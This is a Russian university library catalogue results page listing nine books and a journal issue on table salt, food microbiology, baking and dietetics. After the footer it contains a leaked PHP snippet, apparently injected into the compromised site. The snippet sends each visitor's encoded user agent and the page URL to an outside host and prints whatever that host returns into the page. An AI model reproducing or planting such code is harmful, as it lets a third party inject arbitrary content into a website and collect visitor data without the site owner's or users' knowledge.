Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

27 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=СОЛЬ ПОВАРЕННАЯ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 9
1. 
Мудрецова-Висс К. А. Основы микробиологии [Текст] / К. А. Мудрецова-Висс, В. П. Дедюхина, Е. В. Масленникова, 2015. - 383 с.
Ключевые слова 
МИКРОБИОЛОГИЯ -- БАКТЕРИИ -- ВИРУС - МИКРОБИОЛОГИЯ -- ФАГИ -- ГРИБЫ - МИКРОБИОЛОГИЯ -- ДРОЖЖИ - МИКРОБИОЛОГИЯ -- МИКРООРГАНИЗМЫ -- ПРОЦЕСС БИОХИМИЧЕСКИЙ -- ПРОЦЕСС АНАЭРОБНЫЙ -- ПРОЦЕСС АЭРОБНЫЙ -- ФАКТОР АБИОТИЧЕСКИЙ -- ФАКТОР БИОТИЧЕСКИЙ -- МИКРООРГАНИЗМ ПАТОГЕННЫЙ -- ИНФЕКЦИЯ ПИЩЕВАЯ -- ОТРАВЛЕНИЕ ПИЩЕВОЕ -- ПРОФИЛАКТИКА ПИЩЕВЫХ ЗАБОЛЕВАНИЙ -- КОНТРОЛЬ МИКРОБИОЛОГИЧЕСКИЙ -- КАЧЕСТВО ПИЩЕВЫХ ПРОДУКТОВ -- МИКРОФЛОРА ПОЧВЫ -- МИКРОФЛОРА ВОДЫ -- МИКРОФЛОРА ВОЗДУХА -- МИКРОФЛОРА ТАРЫ -- МИКРОФЛОРА УПАКОВОЧНЫХ МАТЕРИАЛОВ -- МИКРОФЛОРА ТЕЛА ЧЕЛОВЕКА -- МИКРОБИОЛОГИЯ МОЛОКА -- МИКРОБИОЛОГИЯ МОЛОЧНЫХ ПРОДУКТОВ -- МИКРОБИОЛОГИЯ МЯСА -- МИКРОБИОЛОГИЯ КОЛБАСНЫХ ИЗДЕЛИЙ -- МИКРОБИОЛОГИЯ ЯИЦ -- МИКРОБИОЛОГИЯ ЯИЧНЫХ ПРОДУКТОВ -- МИКРОБИОЛОГИЯ РЫБЫ -- МИКРОБИОЛОГИЯ РЫБОПРОДУКТОВ -- МИКРОБИОЛОГИЯ КРУПЫ -- МИКРОБИОЛОГИЯ МУКИ -- МИКРОБИОЛОГИЯ МАКАРОННЫХ ИЗДЕЛИЙ -- МИКРОБИОЛОГИЯ ХЛЕБА -- МИКРОБИОЛОГИЯ ОВОЩЕЙ -- МИКРОБИОЛОГИЯ КОНДИТЕРСКИХ ТОВАРОВ -- МИКРОБИОЛОГИЯ ВКУСОВЫХ ТОВАРОВ -- НАПИТОК АЛКОГОЛЬНЫЙ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- ПРЯНОСТИ -- СОЛЬ ПОВАРЕННАЯ -- МИКРОБИОЛОГИЯ КУЛИНАРНЫХ ИЗДЕЛИЙ -- МИКРОБИОЛОГИЯ КОНСЕРВОВ -- ГИГИЕНА ПИЩЕВЫХ ПРОДУКТОВ -- САНИТАРИЯ - ТОРГОВЛЯ
Держатели документа (Информация об экземплярах) 
2. 
Контроль качества сырья, полуфабрикатов и хлебобулочных изделий [Текст] / С. Я. Корячкина [и др.], 2012. - 495 с.
Ключевые слова 
ПРОИЗВОДСТВО ХЛЕБОПЕКАРНОЕ -- ПРЕДПРИЯТИЕ ХЛЕБОПЕКАРНОЕ -- БЕЗОПАСНОСТЬ СЫРЬЯ -- БЕЗОПАСНОСТЬ ПИЩЕВЫХ ПРОДУКТОВ -- ПРИЕМКА СЫРЬЯ -- МУКА -- ДРОЖЖИ -- СОЛЬ ПОВАРЕННАЯ -- ВОДА ПИТЬЕВАЯ -- СОЛОД -- ПРОДУКТЫ САХАРОСОДЕРЖАЩИЕ -- ПРОДУКТЫ МАСЛОЖИРОВЫЕ -- ЯЙЦЕПРОДУКТЫ -- ПРОДУКТЫ МОЛОЧНЫЕ -- ПРОДУКТЫ ПЛОДОВО-ЯГОДНЫЕ -- ОРЕХИ -- ПРЯНОСТИ -- КОНТРОЛЬ КАЧЕСТВА СЫРЬЯ -- КОНТРОЛЬ ТЕХНОЛОГИЧЕСКОГО ПРОЦЕССА -- КАЧЕСТВО ПОЛУФАБРИКАТОВ -- БРАКЕРАЖ ХЛЕБОБУЛОЧНЫХ ИЗДЕЛИЙ -- ИЗДЕЛИЯ ХЛЕБОБУЛОЧНЫЕ -- ВЫПЕЧКА ПРОБНАЯ -- АКТ ПРОБНОЙ ВЫПЕЧКИ -- ПОКАЗАТЕЛЬ КАЧЕСТВА ХЛЕБОБУЛОЧНЫХ ИЗДЕЛИЙ -- ЦЕННОСТЬ ПИЩЕВАЯ -- ЭТИКЕТКА -- СРОК ГОДНОСТИ ХЛЕБОБУЛОЧНЫХ ИЗДЕЛИЙ
Держатели документа (Информация об экземплярах) 
3. 
Вопросы питания. - Журнал, 2009г. № 4
Оглавление 
  • Влияние специализированного белково-углеродного продукта, обогащенного витаминами и минеральными веществами, на состояние больных с желудочно-кишечной патологией и остеопенией. - с.21-29
    Кл. слова: ПИТАНИЕ ЛЕЧЕБНОЕ
  • Влияние диетотерапии с использованием подсолнечного масла и масла амаранта на показатели иммунной реактивности у больных сахарным диабетом типа 2. - с.30-36
    Кл. слова: ДИЕТОТЕРАПИЯ, ДИАБЕТ САХАРНЫЙ
  • Вкусовая чувствительность к повареной соли у больных артериальной гипертензией. - с.37-39
    Кл. слова: ГИПЕРТЕНЗИЯ АРТЕРИАЛЬНАЯ, СОЛЬ поваренная
  • Влияние хлебобулочных изделий с использованием ячменной, гречневой, овсяной муки и ячменных хлопьев на послепищевую гликемию у больных с сахарным диабетом типа 2. - с.40-46
    Кл. слова: ГЛИКЕМИЯ
  • Содержание селена в хлебе Оренбургской области. - с.47-50
    Кл. слова: СЕЛЕН, ХЛЕБ
  • Чанчаева, Е. А. Антиоксидантная активность плазмы крови у жителей Южного Алтая в зависимости от их возраста и пола / Е. А. Чанчаева. - с.51-53
    Кл. слова: ГИГИЕНА ПИТАНИЯ, ПЛАЗМА крови
  • Невзорова, В. В. Проблемы оценки безопасности наноматериалов, применяемых в упаковке пищевых продуктов / В. В. Невзорова, И. В. Гмошинский, С. А. Хотимченко. - с.54-60
    Кл. слова: УПАКОВКА, БЕЗОПАСНОСТЬ наноматериалов
  • Биологически активные вещества в различных сортах винограда Дагестана. - с.61-64
    Кл. слова: ВИНОГРАД
  • Современные предстовления о взаимодействии витаминов. - с.65-70
    Кл. слова: ВИТАМИНЫ
Держатели документа (Информация об экземплярах) 
4. 
Апет Т. К. Хлеб и булочные изделия [Текст] / Т. К. Апет, З. Н. Пашук, 1997. - 319 с.
Ключевые слова 
ИЗДЕЛИЯ ХЛЕБОБУЛОЧНЫЕ -- ПРОИЗВОДСТВО ХЛЕБОПЕКАРНОЕ -- МУКА -- ДРОЖЖИ -- СОЛЬ ПОВАРЕННАЯ -- СОЛОД -- САХАР -- МЕД -- ПАТОКА -- МОЛОКО -- ЖИР -- МАСЛО -- ЯЙЦА -- ДОБАВКА АРОМАТИЧЕСКАЯ -- ТЕХНОЛОГИЯ ХЛЕБОПЕЧЕНИЯ -- ЗАМЕС ТЕСТА -- РАЗРЫХЛЕНИЕ ТЕСТА -- БРОЖЕНИЕ ТЕСТА -- ТЕСТО ПШЕНИЧНОЕ -- ТЕСТО РЖАНОЕ -- ПЕЧЬ ХЛЕБОПЕКАРНАЯ -- ХРАНЕНИЕ ХЛЕБА -- ЧЕРСТВЕНИЕ ХЛЕБА -- БОЛЕЗНИ ХЛЕБА -- ДЕФЕКТЫ ХЛЕБА -- ПЕКАРНЯ МАЛАЯ -- СОРТ ХЛЕБА -- ИЗДЕЛИЯ ДИЕТИЧЕСКИЕ -- ИЗДЕЛИЯ СДОБНЫЕ -- ХЛЕБ СДОБНЫЙ -- БУЛКИ СДОБНЫЕ -- ПИРОГ -- КАРАВАЙ -- ЛЕПЕШКА -- ПЛЮШКА -- ВАТРУШКА -- ПИРОЖКИ -- ВЫПЕЧКА ДОМАШНЯЯ
Держатели документа (Информация об экземплярах) 
5. 
Вытовтов А. А. Товароведение и экспертиза вкусовых товаров [Текст] / А. А. Вытовтов, 2015. - 575 с.
Держатели документа (Информация об экземплярах) 
6. 
Коробкина, Зоя Васильевна. Товароведение и экспертиза вкусовых товаров [Текст] : Учебник гриф-МО / З. В. Коробкина, С. А. Страхова, 2003. - 352 с.
7. 
Химия [Текст] : научно-популярная литература / Сост. К. Люцис, 2001. - 476 с.
Держатели документа (Информация об экземплярах) 
8. 
Химия [Текст] : научно-популярная литература / Сост. К. Люцис, 2001. - 636 с.
Ключевые слова 
АЛХИМИЯ -- Краска -- Сода -- Кислота -- Бронза -- Медь -- Железо -- Удобрение минеральное -- Энтропия -- КРИСТАЛЛИЗАЦИЯ -- Кристалл -- Бумага -- Сахар -- СОЛЬ ПОВАРЕННАЯ -- ЗАКОН ПЕРИОДИЧЕСКИЙ -- МЕТАЛЛ -- Неметаллы -- Золото -- Гелий -- Азот -- Фтор -- Сера -- Ртуть -- Кислород -- Углерод -- Графит -- Алмаз -- ГАЗ природный -- НЕФТЬ -- Эфир -- Спирт -- Химия - Словарь терминов -- Яд -- Агат -- Хрусталь горный -- Аметист -- Сердолик -- Опал -- Яшма -- Жемчуг -- Янтарь -- Коралл -- Янтарь -- Рубин -- Гранат -- Изумруд -- Хризолит -- КАМЕНЬ ДРАГОЦЕННЫЙ -- Малахит -- Сапфир -- Бирюза -- Аквамарин -- Чугун -- Сталь -- ДОЖДЬ КИСЛОТНЫЙ -- ПАРНИКОВЫЙ ЭФФЕКТ -- ОКЕАН - ЭКОЛОГИЯ -- ВОДА - ЭКОЛОГИЯ
Держатели документа (Информация об экземплярах) 
9. 
Эвенштейн, Зиновий Михайлович. Популярная диетология [Текст] / З. М. Эвенштейн, 1990. - 316, [3] с.
Ключевые слова 
ФИЗИОЛОГИЯ -- БИОХИМИЯ -- ПИТАНИЕ -- РАЦИОНАЛЬНОЕ -- ДИЕТА -- КУЛИНАРИЯ -- ВОЛОКНО ПИЩЕВОЕ -- КИСЛОТЫ ОРГАНИЧЕСКИЕ -- ВЕЩЕСТВО ДУБИЛЬНОЕ -- ПИГМЕНТЫ -- ФИТОНЦИДЫ -- ХОЛЕСТЕРИН - ПИТАНИЕ -- ПИЩЕВОРЕНИЕ -- ВКУС ПИЩИ -- АППЕТИТ -- ЖАЖДА -- ГОМЕОСТАЗ -- АЛЛЕРГИЯ ПИЩЕВАЯ -- ПИТАНИЕ РАЦИОНАЛЬНОЕ -- МАССА ТЕЛА НОРМАЛЬНАЯ -- ОЖИРЕНИЕ -- ДИЕТОТЕРАПИЯ -- КУЛИНАРИЯ ДИЕТИЧЕСКАЯ -- БЛЮДА ДИЕТИЧЕСКИЕ -- СЛАДКОЕДЕНИЕ -- СОЛЬ ПОВАРЕННАЯ -- ПРЯНОСТИ -- КОФЕ -- ВИНО -- ЦЕННОСТЬ ПИЩЕВАЯ


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3020 - 16.09.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.87 с.14 запросов, 0.59c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;